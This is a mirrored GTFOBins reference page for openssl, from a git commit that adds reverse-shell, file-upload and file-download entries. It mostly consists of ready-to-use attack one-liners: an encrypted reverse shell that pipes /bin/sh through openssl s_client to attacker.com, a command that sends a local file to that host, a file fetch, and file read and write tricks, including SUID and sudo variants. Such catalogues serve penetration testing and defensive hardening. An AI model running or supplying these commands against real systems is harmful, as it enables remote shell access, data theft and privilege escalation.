GTFOBins.github.io/openssl.md at cdb4576c85c5300bddedc60b96aca69c1615dc48 - GTFOBins.github.io - git.dotya.ml

mirror/GTFOBins.github.io

mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-19 02:11:39 +02:00

Roman Mueller cdb4576c85 Add reverse-shell, file-upload and file-download.

2019-03-05 09:37:52 +01:00

1.9 KiB

Raw Blame History

functions

reverse-shell

file-upload

file-download

file-write

file-read

suid

sudo

description	code
Run `openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes && openssl s_server -quiet -key key.pem -cert cert.pem -port 12345` on the attacker box to receive the shell. Communication between attacker and target will be encrypted.	RHOST=attacker.com RPORT=12345 mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 \| openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s

description	code
Send a file to a TCP port, transmission will be encrypted. Run `openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes && openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 > file_to_save` on the attacker box to collect the file.	RHOST=attacker.com RPORT=12345 LFILE=file_to_send openssl s_client -quiet -connect $RHOST:$RPORT < "$LFILE"

description	code
Fetch a file from a TCP port, transmission will be encrypted. Run `openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes && openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 < file_to_send` on the attacker box to send the file.	RHOST=attacker.com RPORT=12345 LFILE=file_to_save openssl s_client -quiet -connect $RHOST:$RPORT > "$LFILE"

code
LFILE=file_to_write echo DATA \| openssl enc -out "$LFILE"

code
LFILE=file_to_write TF=$(mktemp) echo "DATA" > $TF openssl enc -in "$TF" -out "$LFILE"

code
LFILE=file_to_read openssl enc -in "$LFILE"

code
LFILE=file_to_write echo DATA \| openssl enc -out "$LFILE"

code
LFILE=file_to_write echo DATA \| sudo openssl enc -out "$LFILE"